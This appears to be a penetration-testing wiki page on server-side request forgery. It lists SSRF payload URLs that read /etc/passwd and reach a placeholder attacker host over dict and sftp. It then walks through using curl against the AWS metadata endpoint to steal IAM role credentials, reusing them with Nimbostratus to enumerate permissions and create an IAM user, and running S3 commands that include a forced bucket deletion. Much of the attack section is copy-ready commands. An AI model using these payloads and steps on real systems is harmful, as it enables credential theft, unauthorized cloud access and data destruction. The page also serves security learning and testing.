Server-side request forgery

Search…
Server-side request forgery (SSRF) exploits the trusted relationship between a web server and other backend systems which are not normally accessible to an attacker (e.g. because of firewalls or application rules). They are particularly dangerous in cloud infrastructure like AWS, because SSRF allows an attacker to query internal services like Amazon's metadata API for credentials and other sensitive data.
Techniques
Basic
Generally, you'll be looking for poorly-sanitized parameters which accept URLs, either in GET or POST requests. Less well-known locations for SSRF include:
HTTP Referer header
Partial URLs in requests (assembled server-side)
​SSRF via XXE​
In the examples below, localhost is used in the URL to access data and services which are only accessible via the local network.
Example GET request with a vulnerable open redirect:
1
http://[host]/page?url=http://localhost/api/getuser/id/1
Copied!
Example POST request with a similarly unsanitized URL parameter:
1
POST /page HTTP/1.0
2
Content-Type: application/x-www-form-urlencoded
3
Content-Length: 300
4
​
5
url=http://localhost:1234
Copied!
Some SSRF attacks will return a response that you can see on the vulnerable website, but others may be blind.
You can also test protocols other than HTTP:
1
http://[host]/page.php?url=file:///etc/passwd
2
http://[host]/page.php?url=dict://[evilhost]:1234/
3
http://[host]/page.php?url=sftp://[evilhost]:1234/
4
http://[host]/page.php?url=ldap://localhost:1234/%0astats%0aquit
Copied!
Attacking AWS with SSRF
Amazon's AWS has an internal metadata service which can be queried from any instance. Attackers can use SSRF vulnerabilities to retrieve instance information and in some cases make changes to the infrastructure. Amazon's CLI performs a similar function.
There are two metadata standards for the AWS API - the newest one requires you to generate a short-term token before issuing commands. However, the older non-token version does not seem to be going away, so you could simply use curl http://169.254.169.254/whatever to get the same data.
The following command from Amazon's metadata documentation allows you to generate a 6-hour token, save it in a variable and display the top-level metadata items:
1
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` \
2
&& curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
Copied!
The top-level metadata items will look something like this:
1
ami-id
2
ami-launch-index
3
...
4
public-keys/
5
security-groups
Copied!
From there, you can make calls to the API to view each of the metadata items in detail.
For example, the following command lets you view startup scripts for the instance, which may reveal credentials or paths to sensitive S3 buckets:
1
curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/user-data/
Copied!
To view roles for the instance:
1
curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/iam/security-credentials/
Copied!
Once you have a role name, you can request credentials for that role:
1
curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/iam/security-credentials/SomeRole
2
​
3
{
4
  "Code" : "Success",
5
  "LastUpdated" : "2019-12-03T18:08:16Z",
6
  "Type" : "AWS-HMAC",
7
  "AccessKeyId" : "ASIA...",
8
  "SecretAccessKey" : "V...",
9
  "Token" : "SomeBase64==",
10
  "Expiration" : "2019-12-04T00:17:43Z"
11
}
Copied!
At this point you may want to consider automated AWS metadata enumeration tools like Nimbostratus to determine the permissions available to a role:
1
sudo python nimbostratus dump-permissions --access-key=ASIA... --secret-key=V...
Copied!
You can also attempt to create a new user, as a proof-of-concept:
1
sudo python nimbostratus create-iam-user --access-key=ASIA... --secret-key=p...
Copied!
Enumerating S3 buckets
The AWS CLI can be used to poke around connected S3 buckets. Some useful commands:
1
aws s3 mb s3://bucket-name            # create a bucket
2
aws s3 ls                             # list buckets
3
aws s3 ls s3://bucket-name            # list things in a bucket
4
aws s3 rb s3://bucket-name --force    # delete bucket + contents
Copied!
Further reading
​SSRF: Web Security Academy​
​SSRF: types and exploits​
​SSRF and the CapitalOne breach​
​Nimbostratus: tools for fingerprinting and exploiting Amazon​
​Pacu: Amazon exploitation framework​
​SSRF payloads for many cloud providers​
Cross-site request forgery
SQL injection
Last modified 28d ago
Copy link
Contents
Techniques
Basic
Attacking AWS with SSRF